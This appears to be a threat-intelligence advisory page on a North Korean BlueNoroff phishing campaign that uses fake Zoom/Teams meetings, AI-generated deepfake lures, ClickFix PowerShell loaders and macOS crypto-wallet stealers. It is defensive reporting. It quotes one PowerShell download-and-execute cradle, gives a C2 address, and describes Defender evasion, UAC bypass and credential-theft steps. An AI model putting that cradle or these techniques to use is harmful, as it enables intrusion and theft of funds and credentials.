BlueNoroff "ClickFake Interview" Zoom/Teams Phishing Kit: AI Deepfake Video Lures, ClickFix PowerShell Loaders, and Crypto Wallet/iCloud Keychain Theft — Threadlinqs Intelligence
As of 2026-07-24, BlueNoroff "ClickFake Interview" Zoom/Teams Phishing Kit: AI Deepfake Video Lures, ClickFix PowerShell Loaders, and Crypto Wallet/iCloud Keychain Theft is a high-severity malware threat attributed to APT38 (North Korea (DPRK)), tracked by Threadlinqs Intelligence with 9 detection rules (Splunk SPL, Microsoft KQL, Sigma) and 35 indicators of compromise.
Threat ID: TL-2026-1678 · Severity: HIGH · Status: ACTIVE · Category: MALWARE
Attribution: APT38 · North Korea (DPRK) · FINANCIAL
North Korean-aligned BlueNoroff (Lazarus Group financial sub-cluster) is running active ClickFix-style phishing campaigns using typosquatted Zoom/Teams meeting domains and AI-generated deepfake video
BlueNoroff, the financially motivated cybercrime sub-cluster of North Korea's Lazarus Group, is operating an active phishing-kit campaign publicly tracked (in overlapping reporting from Sekoia, Arctic Wolf, and Huntress) as "ClickFake Interview"/fake-meeting operations. The operation begins with social engineering over Telegram or LinkedIn/X using a hijacked or fabricated contact, a manipulated Calendly invite, and a typosquatted Zoom or Microsoft Teams domain (over 80 such domains identified, registered in bulk with a single hosting provider). Victims are drawn into a self-contained JavaScript fake meeting room that captures webcam video via getUserMedia and streams it to attacker infrastructure, seeding a self-reinforcing AI deepfake production pipeline (ChatGPT/GPT-4o generated portraits composited with real captured body movement using Adobe Premiere Pro, FFmpeg, and Microsoft Clipchamp) used to spoof legitimacy in subsequent calls.
Approximately eight seconds into the fake call, a ClickFix-style overlay prompts the victim to "fix" a fabricated audio/SDK error by copying and pasting a command; the attacker intercepts the clipboard and injects a PowerShell download-cradle (`powershell -ep bypass -c "(iwr ... -UseBasicParsing).Content | iex"`). This downloads a Base64/XOR (key 0x43) obfuscated second-stage PowerShell downloader that lands a further payload in `%TEMP%\chromechip.log`, disables/exclusions Microsoft Defender, and displays a fake "Zoom was updated successfully" dialog to dispel suspicion. A final in-memory PowerShell implant beacons every five seconds to a dedicated C2 (observed: `83.136.208.246:6783/api/daemon`), exfiltrating host reconnaissance data (hostname, username, OS build, timezone, running processes, admin/proxy status).
Post-exploitation modules include: Telegram Desktop session theft (`tdata`/`key_datas`) enabling account-hijack-driven onward campaigns; a Donut-loaded, MSVC-compiled native PE64 browser-credential stealer that recovers Chrome/Edge/Brave app-bound encryption keys via COM elevation (`IElevator`) and AES-256-GCM/BCrypt decryption, writing credentials to `pchr.csv`/`pmse.csv`/`pbra.csv`; screenshot capture via both direct HTTP POST and Telegram Bot API; UAC-bypass privilege escalation via the `Elevation:Administrator!new` COM moniker; and Startup-folder LNK persistence disguised as a Chrome updater (observed to persist up to 66 days).
On macOS, a fake Teams/Zoom `.pkg`/AppleScript installer (`zoom_sdk_support.scpt`) drops a modular toolset written in Go, Nim, Objective-C, Swift, and C/C++: a Go backdoor ("Root Troy V4"/`remoted`), a Go infostealer ("CryptoBot"/`airmond`), an Objective-C keylogger ("XScreen"/`keyboardd`) using Core Graphics EventTap, and a Nim-based persistent implant masquerading as "Telegram 2", installed as a LaunchDaemon (`/Library/LaunchDaemons/com.telegram2.update.agent.plist`) running hourly. The macOS toolset enumerates and exfiltrates data for 25+ cryptocurrency wallet browser extensions (MetaMask, Phantom, Rabby, OKX, Trust, TON, Sui, and others), extracts Chrome master keys sourced from iCloud Keychain, and captures keystrokes, screenshots, clipboard content, and audio, exfiltrating over HTTPS and WebSocket C2 channels and a dedicated Telegram channel ("Aurora").
Victimology skews heavily toward cryptocurrency/Web3 and adjacent finance/investment roles: of 100 identified targets in the Arctic Wolf dataset, 80% work in Web3/crypto, 76% hold C-level or founder titles, and targeting is concentrated during DPRK business hours (08:00-18:00 KST, Monday-Friday). The campaign is under continuous, rapid development — five distinct phishing-kit versions were fielded between 31 May and 14 July 2026 — consistent with a well-resourced, state-directed operation rather than opportunistic cybercrime.
Weaknesses (CWE)
CWE-451, CWE-311, CWE-522, CWE-494
Target sectors: cryptocurrency, blockchain, venture-capital, finance, investment, web3, technology
Target regions: North America, Europe, East Asia, Southeast Asia, united kingdom, Middle East
Detections & IOCs
As of 2026-08-24, this threat has 9 detection rule(s) across Splunk SPL, Microsoft KQL and Sigma, and 35 indicator(s) of compromise. Detection query text and full IOC values are available to authenticated users and programmatically via the Threadlinqs MCP server (Purple tier). View plans.
Community OSINT corroboration
3 of this threat's indicators have also been reported by the open-source security community, which observed at least one of them before this report was published. Community sightings are unverified and are kept separate from Threadlinqs' curated indicators. Indicator values, reporters and campaign linkage are available to authenticated Red-tier users.
MALWARE, HIGH, threat intelligence, cybersecurity, T1598, T1566, T1204, T1059, T1106, T1547, T1037, T1134, T1548, T1036